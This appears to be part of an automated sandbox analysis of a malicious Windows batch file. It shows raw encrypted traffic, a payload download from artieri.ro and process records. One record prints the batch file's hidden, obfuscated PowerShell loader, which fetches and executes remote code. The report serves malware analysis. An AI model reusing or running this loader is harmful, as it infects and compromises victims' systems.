                                                                                                                                                    2024-10-17 12:18:19 UTC16384INData Raw: 6f 31 4c 79 51 4b 38 6a 6f 38 73 71 45 7a 39 54 4b 35 71 69 51 74 6e 4a 39 58 51 59 4f 4f 76 6e 71 31 31 50 2f 51 38 6c 49 7a 77 76 48 6e 31 64 71 32 32 34 6c 35 76 6e 38 46 65 6a 65 4b 76 78 74 36 4e 6c 74 43 31 34 69 4a 43 2b 75 69 71 68 56 48 6f 2f 6e 43 70 48 58 31 39 61 69 36 58 35 48 73 61 39 4d 2b 38 4f 37 42 76 50 37 6e 4e 65 34 4e 4e 77 33 48 37 38 43 77 56 4e 77 4a 6f 41 64 52 45 2f 55 79 75 61 6f 70 6d 51 37 6c 50 6b 76 78 74 49 31 4b 41 7a 62 30 72 41 7a 38 52 4e 37 63 77 2b 51 73 79 62 74 46 5a 4d 48 32 71 37 4c 79 63 48 48 30 38 44 6f 55 79 39 45 54 77 66 64 66 6d 58 55 48 41 32 2b 2b 72 6f 79 39 68 50 44 4a 38 70 62 6c 73 44 56 73 74 38 59 30 4b 70 68 75 4d 74 42 78 73 34 4a 67 46 30 48 6d 75 52 4a 56 32 51 77 43 71 61 6f 73 73 71 6d 71 4c
                                                                                                                                                    Data Ascii: o1LyQK8jo8sqEz9TK5qiQtnJ9XQYOOvnq11P/Q8lIzwvHn1dq224l5vn8FejeKvxt6NltC14iJC+uiqhVHo/nCpHX19ai6X5Hsa9M+8O7BvP7nNe4NNw3H78CwVNwJoAdRE/UyuaopmQ7lPkvxtI1KAzb0rAz8RN7cw+QsybtFZMH2q7LycHH08DoUy9ETwfdfmXUHA2++roy9hPDJ8pblsDVst8Y0KphuMtBxs4JgF0HmuRJV2QwCqaossqmqL
                                                                                                                                                    2024-10-17 12:18:19 UTC16384INData Raw: 52 38 36 74 61 4c 4c 41 49 77 31 41 38 64 6c 37 65 43 42 37 61 44 6b 77 49 7a 6b 44 6b 50 76 31 71 32 67 69 4d 65 73 57 49 77 6b 63 45 64 72 35 71 33 42 55 4a 79 6a 52 4b 39 48 4d 34 6c 4e 68 37 56 53 63 42 47 71 48 6b 6d 6d 72 4f 36 4e 4a 54 77 39 51 36 48 47 42 36 4c 78 4b 48 78 2f 76 78 4d 6e 35 6b 58 77 52 46 35 41 6f 6d 71 4b 59 6b 53 31 4c 45 48 49 62 59 61 6f 73 50 52 56 4b 36 58 73 6f 4b 41 51 62 59 52 72 33 41 32 4a 43 47 62 70 57 31 66 67 52 6a 69 79 6c 79 78 45 55 33 67 4a 6a 74 6f 34 66 79 76 37 6b 7a 42 77 39 48 4d 30 79 50 49 33 77 36 46 77 37 6c 76 6e 66 70 52 43 5a 75 7a 37 78 78 4a 42 43 6d 77 6a 4f 6e 38 67 59 73 6a 58 62 75 6b 72 59 48 4a 63 6c 6a 78 74 51 6f 59 56 55 78 55 72 41 4f 71 53 71 38 42 4f 67 32 45 54 71 38 54 33 48 79 72 62
                                                                                                                                                    Data Ascii: R86taLLAIw1A8dl7eCB7aDkwIzkDkPv1q2giMesWIwkcEdr5q3BUJyjRK9HM4lNh7VScBGqHkmmrO6NJTw9Q6HGB6LxKHx/vxMn5kXwRF5AomqKYkS1LEHIbYaosPRVK6XsoKAQbYRr3A2JCGbpW1fgRjiylyxEU3gJjto4fyv7kzBw9HM0yPI3w6Fw7lvnfpRCZuz7xxJBCmwjOn8gYsjXbukrYHJcljxtQoYVUxUrAOqSq8BOg2ETq8T3Hyrb


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.44973989.44.138.1294435172C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-17 12:18:56 UTC199OUTGET /g/MihrGCaVzvslPdUujzk140.bin HTTP/1.1
                                                                                                                                                    User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Host: artieri.ro
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2024-10-17 12:18:56 UTC404INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    content-type: application/octet-stream
                                                                                                                                                    last-modified: Thu, 17 Oct 2024 08:46:26 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 494656
                                                                                                                                                    date: Thu, 17 Oct 2024 12:18:56 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                    2024-10-17 12:18:56 UTC964INData Raw: 04 5d 03 92 fd e0 35 a0 d9 76 15 98 c7 ff 80 b1 33 44 81 1e c8 e2 f4 ad 67 16 53 8f 27 54 09 e3 e2 b4 c1 c2 a7 76 cf 45 0c 19 07 3f a0 67 89 6f 84 7a 5a a6 d3 bd 9a 9d b5 72 3b 0a b9 4c 3e d8 e4 56 28 cb ad e8 e8 de 41 3f 61 aa 17 88 86 70 e2 eb e5 9c 5d c2 7d 57 25 de 1d 36 6e 1f ce 30 d3 eb 64 84 20 ec 2d 46 7a dc 9e cf 13 8f e2 2d 9b 08 fa 3c 88 19 32 c6 c6 71 51 0f 87 c7 83 0a 25 b3 3f d2 a9 4e 7a 8f 78 ee 71 99 dc f5 20 8d 27 fc 14 38 09 7d b0 5d b3 3f 2b 75 17 df a1 10 cf fb 8d bc a2 56 59 bb 86 70 0f f1 97 ea af e8 b8 e1 1d a2 87 42 0b 18 2c 6d d2 65 02 2a 89 53 47 49 9e 38 ae 86 23 85 64 63 f4 3a 24 9b 88 96 a3 12 f5 74 5d 6c 76 92 19 9b db 44 a7 4b 4c f0 1c 37 7a 2b 78 cb 07 25 04 6f 65 27 ec e6 c4 0e 30 08 34 e0 17 73 5a 22 97 27 90 74 45 4a f5
                                                                                                                                                    Data Ascii: ]5v3DgS'TvE?gozZr;L>V(A?ap]}W%6n0d -Fz-<2qQ%?Nzxq '8}]?+uVYpB,me*SGI8#dc:$t]lvDKL7z+x%oe'04sZ"'tEJ
                                                                                                                                                    2024-10-17 12:18:56 UTC14994INData Raw: 5a 23 60 30 34 2a b2 ac b8 dc 20 2a 41 d4 ed 1d c5 27 d6 7a 69 1c 31 1d 22 2a 55 2f ff 62 aa 6d 65 67 b3 02 46 01 09 3b 5a 17 ce 96 b1 f3 ae c8 e0 09 6b dc 50 96 90 47 9e eb d4 a5 8b 39 c4 c7 04 d9 44 4a 89 e0 52 54 2a c0 3a 8c 26 ba d2 90 1f 1c 3f 35 a8 bb 08 19 75 32 a1 d4 3e de 86 b3 f6 a5 90 a4 ef d1 6a 70 56 7c 25 e4 01 6c 1e 0a ce 15 32 fd 55 de af 32 b1 73 07 2e 9d 09 fd b1 fd 2d fa d6 1a 57 18 c2 05 2e 3e 3e de a3 4d 30 b7 05 2d 81 ec be d7 8a 8e ce 05 98 43 b7 fc 9b b4 97 4b ad 2e b3 1b ca db 24 06 d0 8f cd c2 a8 50 85 a8 57 30 51 9a fc cc 69 b5 d1 ab 75 e9 77 00 f5 15 61 5d e7 dd 9a 2c fe b6 19 c7 b2 f9 cf fe fd 64 10 73 24 8c 6e f0 5b 97 fe 94 bd 03 a9 b5 08 86 e9 e8 00 57 73 3f 61 c2 55 08 c3 70 b2 62 d2 9f 5d 9b be ee 55 90 5a 36 86 44 de 30
                                                                                                                                                    Data Ascii: Z#`04* *A'zi1"*U/bmegF;ZkPG9DJRT*:&?5u2>jpV|%l2U2s.-W.>>M0-CK.$PW0Qiuwa],ds$n[Ws?aUpb]UZ6D0
                                                                                                                                                    2024-10-17 12:18:56 UTC16384INData Raw: c9 4c 13 9b 98 32 5a af 5d 1d fa a3 67 cb d1 4e 17 db eb 09 29 bb fb 2f 36 78 d6 50 12 a8 5f d6 8f 81 8e de 15 d0 a2 b9 64 f1 cf 58 16 f0 c1 6c e5 9e 7f 28 b9 e9 9a 6f 12 01 89 ca 72 fd 11 6a 62 20 78 01 27 ee 39 10 ca 9b 2b fd 70 e4 82 86 76 29 34 0d dc b3 84 08 11 be 50 45 54 5f ed 76 bf 2f 21 30 82 59 3e 1e 23 d9 0f 3b 83 b5 78 8f 2e 69 1b dd 2c 21 c7 c4 d5 9c cc 2b ed 17 47 3e bd 5b 74 af 6b 11 eb b1 aa e8 aa b9 0f db 59 2a 2c 39 5b 36 be 13 a7 a2 84 ce 2c 66 26 0a 99 c7 96 dd 0e cd c2 f2 5e 07 93 27 52 53 7a bf db 70 6e 85 3a 65 c1 24 74 7f 38 e9 15 96 0e 38 bf 8e e4 b7 3a 46 1c 1f 4d 08 01 7f e5 d7 26 87 ba db 79 50 5f 51 aa c9 73 a4 a5 c0 b6 fa 14 47 2c f6 d8 9e 1e 08 fa b8 5c 52 e5 cb 3f 48 0c 6a 6a 09 8c ea 55 12 79 79 6f 9e 5b 5b a4 1a eb 22 1f
                                                                                                                                                    Data Ascii: L2Z]gN)/6xP_dXl(orjb x'9+pv)4PET_v/!0Y>#;x.i,!+G>[tkY*,9[6,f&^'RSzpn:e$t88:FM&yP_QsG,\R?HjjUyyo[["
                                                                                                                                                    2024-10-17 12:18:57 UTC16384INData Raw: e3 21 94 9d bc 42 0a 06 e9 49 9a ce 5a 41 82 98 bd 57 1a c6 5b 56 d1 24 f7 03 24 f7 70 ba 01 fe 4e f2 fd c8 15 7d ae 98 49 0e e9 ce 03 c8 ca e7 06 79 8a 7c 30 ea 0d 20 d2 f0 96 6a 80 7b c0 7c 9c cb ee cb 1a a5 cb d5 3f e1 b0 34 83 be be 2b 60 50 e5 cf 4d ee 96 e3 bc 50 1a c2 37 ba 00 9d 1a 6c 8e 52 4c 77 ae fe 1c a3 c8 52 ce 2e 38 79 ee c8 23 8a 26 20 af 1b dd f3 76 a8 41 5a 74 b4 89 cf ec b5 d0 b5 76 6d 1f 74 c2 a4 ae 73 d9 37 9f a8 f7 37 aa ca 57 89 c8 92 38 c6 c5 5d 33 de 86 b3 f6 fa ce ff 64 34 37 b3 03 f7 c9 65 ed f4 1e 0a ce 95 0f e5 7e 99 af 32 e2 25 8c df 50 6a 82 2d 14 67 86 d9 1a da fd 22 85 94 c1 3e 84 94 4e 30 6d 2a 8c 70 e4 c1 5c ae 61 36 05 0e d4 da 00 32 ac f2 d9 ba a6 7f 12 e1 f1 b9 4b 97 0c c9 73 35 15 8d 4b 07 1f fc 1f 11 0d 5e e0 5c 7f
                                                                                                                                                    Data Ascii: !BIZAW[V$$pN}Iy|0 j{|?4+`PMP7lRLwR.8y#& vAZtvmts77W8]3d47e~2%Pj-g">N0m*p\a62Ks5K^\
                                                                                                                                                    2024-10-17 12:18:57 UTC16384INData Raw: 73 68 11 26 0b 84 16 a4 ce e1 6f 08 30 8c 2f 25 c0 3d b9 e8 b8 84 f0 57 eb 5a 72 6b 7e 72 ec 74 f6 c8 5f 91 e7 a4 59 34 01 d0 0c 7a 29 67 94 bf ea e1 16 66 31 3d c9 a2 81 26 30 96 62 bf ca d0 37 98 11 44 f1 8a 2c 9f 8d 13 74 a8 94 3c 7e cf 93 2e 34 43 7d 75 74 95 97 b0 12 90 b3 c1 40 2e af cd 2f e0 4b 57 69 79 29 b3 a9 aa 0d c9 15 79 e4 1a 14 4a 49 17 2c 9a ff 72 45 b0 36 6e 00 e2 0d 9e db 27 92 aa fe b4 3d d6 bc a0 dd e8 d8 f0 07 15 d6 ff 34 84 01 3e f9 39 da cb cc 36 bc 9a fa 54 0a c8 6c 8a fb 86 8d 2f 64 b1 8b df 19 dc 6e b0 b0 a0 39 b1 54 84 0d 43 1f 48 16 be c5 73 f6 6b 3f 5c 23 36 a5 f4 f4 73 8a d8 38 5b b0 92 57 df 23 5b 07 c6 65 75 49 6e ad a0 da e4 6b 1b 62 64 67 16 43 96 73 17 ff 07 de 33 a0 ad 46 e9 bc 44 2e d8 f1 18 30 2f 23 79 b9 ef b7 73 ff
                                                                                                                                                    Data Ascii: sh&o0/%=WZrk~rt_Y4z)gf1=&0b7D,t<~.4C}ut@./KWiy)yJI,rE6n'=4>96Tl/dn9TCHsk?\#6s8[W#[euInkbdgCs3FD.0/#ys
                                                                                                                                                    2024-10-17 12:18:57 UTC16384INData Raw: c0 b9 e1 e6 5b 7f b0 66 d8 5b d3 6b 02 2b 3a 3c 60 81 df 5a c6 76 7e 08 3b e9 bc c9 11 c1 e2 c1 74 6e bd 18 c1 04 d4 64 2c 90 b6 1b 9c c7 52 d2 9c 53 63 5e f6 f1 b6 83 bc 95 1d a7 9d 29 89 f3 4b 6d 30 eb 26 c6 d7 80 c9 77 a0 04 e6 81 24 70 0f 0c 60 c4 a9 25 8a de ab 0c 3b 0f be 63 26 21 30 33 9e df e0 88 f3 8c a5 9e e9 63 28 ca 82 22 99 36 a3 34 6e 1f 6f 70 b8 ac 64 0d 5e a0 a4 00 3a 7d da a4 54 8f bd a4 c5 30 73 7a cc 47 69 4d 23 2c 93 07 9f 90 08 fb 7c 2f fb 90 a9 8f 77 71 a6 bd 6e 3d 23 2a 8b 1a b1 f9 78 7b b2 99 29 ab 12 5d 4f ef 9e 26 39 7d bb 82 dc 10 07 e4 23 90 5f 73 63 bb d3 2e 32 20 9a 71 86 38 22 88 59 4c cb 38 59 89 53 7b df d8 ba b1 58 59 e6 e9 b1 91 6c 86 57 48 93 f4 56 00 14 da d0 0a 85 b2 ac 69 25 69 ce 50 49 01 11 40 08 af a1 aa d1 5c 94
                                                                                                                                                    Data Ascii: [f[k+:<`Zv~;tnd,RSc^)Km0&w$p`%;c&!03c("64nopd^:}T0szGiM#,|/wqn=#*x{)]O&9}#_sc.2 q8"YL8YS{XYlWHVi%iPI@\
                                                                                                                                                    2024-10-17 12:18:57 UTC16384INData Raw: cc 3f f5 04 37 1b 33 a8 20 c2 9e 62 af 1d a2 e6 b7 45 78 77 7f 01 0c 8c 5b 1d 82 b0 2e df 22 87 71 6d 7c e5 25 66 ea 1f f6 b0 cf ea cc 5b 95 aa 66 65 6a da b0 75 c4 77 9b a5 c5 39 a2 35 af c8 b3 fa f6 1d 24 87 ec 2c db e5 02 75 ab c5 e6 d9 a0 41 76 a1 92 9e 4c 25 a4 39 c5 61 0a a3 f3 29 b7 d8 51 f8 e4 29 36 23 d5 ad fb a9 4f bf 60 cb b8 00 02 cb 69 d9 81 83 cf 4f cd 66 c8 13 dd 83 93 d3 e2 a6 11 f2 60 86 55 35 32 e6 52 5c 03 e1 29 50 dc 1d 11 59 f7 55 0a 76 fa 8e d2 f4 bb 8c f5 5a 0d c9 9b 54 10 66 43 4e c5 f9 15 5f e4 5f a7 83 ad c1 e7 c3 74 84 34 8d 09 87 98 bf 26 4e e0 b6 3d 76 51 30 8e 06 f9 a5 31 12 c8 f4 3f fd f1 58 1b d1 b6 3e 3d 60 25 a3 3c 5b 6a 36 16 58 3b e5 8d 4e 00 9c 84 7e 3e e7 40 6a 20 9b 7b a0 7b ea 35 f1 f4 99 f2 df 55 9a 8d 1e 04 fe 27
                                                                                                                                                    Data Ascii: ?73 bExw[."qm|%f[fejuw95$,uAvL%9a)Q)6#O`iOf`U52R\)PYUvZTfCN__t4&N=vQ01?X>=`%<[j6X;N~>@j {{5U'
                                                                                                                                                    2024-10-17 12:18:57 UTC16384INData Raw: 65 57 4a ec 47 56 9f 5d d9 5f 28 e6 c2 2f 53 4b 32 7f 45 6b d1 39 13 9d ec dc bb e1 cc ba 00 c0 01 2c f5 6e 5e c1 aa e5 90 b3 a6 a0 31 4a 70 1f 3b 0b aa a3 94 1d d8 a9 15 ba d4 c9 03 ed 8f 6d 46 75 f6 bd 27 cb 5c 9a 46 71 0b 17 00 ae dd 5c 00 91 ab de f8 68 2d 04 e6 a0 3d 89 1c e7 7b 66 9c 6e c7 3c 7a 9c 3f c0 a2 40 a8 5d 61 ad 8e a4 8a f8 8f 06 c1 f4 d9 eb 3b 39 89 a2 97 7f 94 31 25 62 a2 b1 9b 0e 03 8f 1b 8c cf 2a 5b 86 16 dc f4 c4 09 11 d8 3b 0a 50 61 f3 44 28 5a 33 c2 6a af b8 36 23 ab c1 4b 73 28 21 19 c9 69 03 56 07 7e 9a de 77 b6 30 41 6d fb 5c fa 8d 69 3f 74 14 06 0e ec 68 bf ff ba 8b 81 da 4d fe e1 e4 e8 71 ce 3a b8 03 e8 0c 33 40 0b 0c 93 43 20 3d f3 1b ec f2 54 aa 58 86 90 78 47 62 b8 b1 08 76 17 68 30 b0 aa 90 9b a7 fb b2 10 e8 37 b8 2f 94 f5
                                                                                                                                                    Data Ascii: eWJGV]_(/SK2Ek9,n^1Jp;mFu'\Fq\h-={fn<z?@]a;91%b*[;PaD(Z3j6#Ks(!iV~w0Am\i?thMq:3@C =TXxGbvh07/
                                                                                                                                                    2024-10-17 12:18:57 UTC16384INData Raw: 91 dd 15 1d b3 f8 00 a8 6b 1b d5 b9 7b cf 49 9a f3 6c 0b 62 a9 47 61 0d ed c0 65 60 5e c7 18 eb 79 cb 13 62 8e f0 91 77 0e 76 78 9d be eb 34 51 b4 7c 71 e1 84 35 43 36 ff 95 15 c9 fc 5d f4 40 21 9a e1 fe b2 a2 bd f0 c4 43 f1 11 57 77 95 a5 a9 0d 43 25 d6 b5 26 5c 49 ac 01 b1 bb 65 76 c0 f6 54 1b 23 ca ae c7 d0 54 22 27 11 6f 74 98 29 ee 40 dc 2d 25 80 7e 6c 9d 06 95 10 f2 66 a0 89 31 3b af 76 ac b8 dc 4a 2b c2 38 f5 96 09 4f fa 1b 2f 1c d9 f8 77 d4 aa 91 27 a9 ec 6d 0d af 78 44 46 8a df d3 b1 7b 31 69 32 37 8e a2 e1 8a 87 c4 db 5a f8 6f ff ad d4 4e f6 53 c5 44 e8 c1 cf 86 e1 e0 94 12 2a 28 88 d9 d8 45 6c 48 d4 5a 3f 5d 60 70 4e 19 fe e4 49 6c 52 21 79 30 32 85 fa a5 6c 3d 72 fb 9a 14 09 85 47 6c f5 40 a4 14 b1 11 4d 55 63 5a b9 b9 41 2e cf a6 da f7 7e 29
                                                                                                                                                    Data Ascii: k{IlbGae`^ybwvx4Q|q5C6]@!CWwC%&\IevT#T"'ot)@-%~lf1;vJ+8O/w'mxDF{1i27ZoNSD*(ElHZ?]`pNIlR!y02l=rGl@MUcZA.~)
                                                                                                                                                    2024-10-17 12:18:57 UTC426INData Raw: 9f c6 81 39 6d ea 3a ba c2 a2 f8 26 e4 e6 5c 35 fc 46 c9 ef d5 40 02 91 9d 04 55 4d b7 74 3f 47 33 b6 9f f1 19 b8 42 ee db bf 6b 64 58 1c e6 64 b7 39 a1 e7 5f a6 62 4c a5 0d aa 73 68 11 1a 06 72 fb 20 85 c6 b9 5f cf f6 5b fa ac b2 1a e8 b8 22 b1 54 13 5b 00 fa a6 fc ed c5 5f c8 5f 54 9a 1e 46 d3 b5 94 0c f7 2a 8c d1 59 86 09 ff 09 6f ff 94 27 a9 fb e9 f4 9d 73 41 6b d3 f7 ec 2b 0e 01 24 fa e5 e7 8b 57 ad 2d 0a 23 0b 69 be 89 16 66 2e e9 14 1f 36 78 11 89 40 a5 b0 a1 5a 6f 32 07 b2 a6 1e 58 ab 1a 09 07 94 b9 29 e7 e1 63 6d e7 b1 d5 8f 5e c9 eb 7f 3d db e6 c4 70 24 fc 83 c3 e4 bc d5 fb 65 9f 57 2d a5 fa f2 fd 55 9a a2 88 da 7c 92 07 8c 34 33 ed 84 8f f1 b9 e2 c2 fe 79 81 fb 21 7d 5d c5 7d ed 74 d2 1a b4 76 64 7d 4c 2e f9 b6 a5 ba bc 21 41 4c 36 1e 6b a7 90
                                                                                                                                                    Data Ascii: 9m:&\5F@UMt?G3BkdXd9_bLshr _["T[__TF*Yo'sAk+$W-#if.6x@Zo2X)cm^=p$eW-U|43y!}]}tvd}L.!AL6k


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:08:18:08
                                                                                                                                                    Start date:17/10/2024
                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKU_0001710-1-2024-SX-3762.bat" "
                                                                                                                                                    Imagebase:0x7ff6e4270000
                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:08:18:08
                                                                                                                                                    Start date:17/10/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:08:18:09
                                                                                                                                                    Start date:17/10/2024
                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriagLygteS ralSplasKo oe Gadr.kol. LobHHugheTribaRet d CoveStatrA skstil [ sj $CentDelimeNazagTendlHuz.uNordtChoniisott wh iHjlpvI,eneCaml]S an= pec$ SkaN G ooFrd dAusce PernBog ');$Nrme=Foreslaa 'Unec$embrO.dspvUnbeeHabirStorsEn.hpp.lyrBr.tiNgtenDemyg lateIn rlKondsTalee tatrKomm.GodsDTricoHolowdc,an.ymplPortoUnpaaDemod SueFGradiBroklTeleeOnch(,ust$tilgSTjrepUmedi BunsHastespeakS aaoComprTilktSku eprictFort,El r$M ltUSyntnFoendCi,ieForlrToeiaPassfHydrkInfelBo b)Ge a ';$Underafkl=$foziness;Heraclitean (Foreslaa 'Etio$,iveGDeioLCucko BruBPe,tAP.olLP,ri:Re,eFIndpLSinuO H moSilisdisqiBreiEKaloS Beg1Narr8.lag6 Acc=Bund(IndgtFon EFormsOlietUnde-Diskp .ulaPro TPa,fh ub A te$Vic,ufyrbNKaradUdfoEBesmR St,aTop.F Hy KForflWa,e) Re ');while (!$Floosies186) {Heraclitean (Foreslaa 'Hoft$IndlgArmllVurdoEr,tbAnmeaV.lul Tux:RedaCPercrMikkeImfcaDisatStrue RemsBjer=Opbe$VisttStarrWhauu M,me Man ') ;Heraclitean $Nrme;Heraclitean (Foreslaa 'S alsforkTPrehA iar d sT,orh- ChrsPro lAnd.EUdm,e BalPCha, Bol4Hvep ');Heraclitean (Foreslaa 'Eth $BiotGFodklDyreoFetibSupeAPjanLPo a:Sem fBlablBasiOdjakOmusoSTirsIMetaeOld SSk o1Chur8 Paa6Eng =Manc(Nonet FatEWh rSSa.et G a-Ov rPRevoaCi,atBoycHvolu Trif$Ref UBombnCamodros eAntiRS peaAltafAgu kTripLHydr)Rece ') ;Heraclitean (Foreslaa 'Cara$ isgHumiL ConomistBunnaAKrumlOpaq:PseugOverlVidnu La T ousCHearh Tek= Pe $Var gAkkoLC mpO GrabPas,aT,lll Gra:Ta.sRstetuDisdtS ciIF,leNE sueSty r SkuE SattDump+Indt+Efte% Mol$PapuMB.agA StaRGrupjH.lduObseNgru STi.f.FremCNatiODebiuSpirn HjrtReka ') ;$Spisekortet=$marjuns[$Glutch];}$khalil=314533;$Humdrumness=30402;Heraclitean (Foreslaa ' ogh$ lgegJernL blnoex,ebPreoaContlTarh:Sa dFTalli MegN MedGphoteO strInteWElitoAs erAttrkPavi Afm= arn SneaGv.gteSlottInds-c itCE,phoNonpN sekTStjeeIndunFisktFast Ret$Nonauunhen ildU grEU hyRhy.oAHedaFFirekIntrlRaad ');Heraclitean (Foreslaa 'Sky $k.ttghonklSalooMiscbF rma dmilT,re:,bjeBB.colMicriAn lcProtkStraeRecoyStoc Disc= Syr nedt[CospSAmp yUnhys FhotBefle kammDamb.TinfCTetroToyinFamivGst eFedtrAuritPneu]R.go:Ayou:DampF Milr omoEx pmIrbiBEfteaYndlsFieleUnmi6Haem4LugeSfngst ronrMassiCabbnPectgExen(Reta$ CreF TiliS otnforkgReumeH.pprBilawImmooHekhrFormk All)Svrt ');Heraclitean (Foreslaa 'Coun$PrecGScanLS.inoKultBlamiaDr,tlYlva:Le,lUGodbPBortH,ounhTrauoStorvEfteE Tid Visi=Du d Fejl[ oths P lyUnemS,necT GloERevimOu.e.Ma stPsameGlycx BevtIacc. VicEHalvNBehacBrylo.lyaDfr diFny n ArgGForb]Frds:ove.:AbscAFormSTrilc Sk.iProei Tru.ScapGBrneEMolatUnbrs hagTIllerAfluiExhon,akkGFun ( S b$ akkbBusmlTr.aI,tancpr bKMange RhoYLo,a)Bron ');Heraclitean (Foreslaa 'pleu$BilaGSpidlSha OUppebPsycaHom LBaha:SkalHKdkrYFlocPBywaETot R SarPPan.YDa rr AssAAssemStimiRedlDHipf=Met $VelvuBiogP MedH dmHLionOAa eVDemoE,ejl.Opris veruTwisbnonoSUt.hT vatR jasIB,adnGli.G,nar(Sel $minik unkhExena OmplCumbIja.bLFork,Inco$ U rhStatuSubsmFolkDKroprmaegUA,grm LatNTylveS,ols LysS ynt) ina ');Heraclitean $Hyperpyramid;"
